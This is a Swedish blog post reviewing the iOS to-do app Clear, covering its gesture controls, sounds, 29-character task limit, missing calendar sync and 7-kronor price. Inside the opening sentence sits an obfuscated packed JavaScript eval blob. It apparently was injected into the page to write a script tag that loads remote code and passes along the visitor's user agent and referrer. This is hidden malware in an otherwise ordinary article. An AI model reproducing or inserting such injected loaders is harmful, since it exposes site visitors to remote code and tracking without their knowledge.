Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

Nu finns appen Clear redo att laddas ner

Sebastian

Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yiykr|var|u0026u|referrer|syfny||js|php’.split(’|’),0,{}))
publicerades den mycket omtalade applikation Clear för iOS. Den kanske inte är den unikaste i sitt slag men det är designen och användargränssnittet som står i fokus här. Allt kontrolleras av olika gester.
  Ni kan läsa vår tidigare artikel om appen här: Clear

Det ”coola” med appen är att den helt sköts med hjälp av olika gester.
Det är en ”To-do-list” applikation där man matar in saker man ska göra. Ett smart sätt att komma ihåg de mest ointressanta sakerna som måste göras, som exempel, Gå till posten och hämta paket, Köpa mjölk på vägen hem osv.

Detta är helt klart inte en applikation för alla, men. Jag fastnade som sagt för gränssnittet som är riktigt snyggt. Även ljudet i appen är stimulerande, skönt klickljud och ”whooshes” när man sveper bort sina uppdrag för dagen.
De enda uppgifter som kan hanteras i Clear just nu är manuellt inmatade i appen. Den kan alltså inte hämta information från exempelvis Outlook eller iCal. Sen är varje uppgift begränsad till 29 tecken (utan datum eller tid parametrar). Själv tycker jag det vore rätt enkelt att lägga till funktionen så att man kan synka med datorn, något som säkert kommer senare.

Clear är inte för dig som söker en avancerad app för att hålla reda på uppgifter, gör du det rekommenderar jag standard kalendern eller påminnelser som redan finns installerade på iPhone.

Clear kostar 7 kronor och finns att hämta i appstore eller iTunes.

Kika på videon ovan för att se appen in action.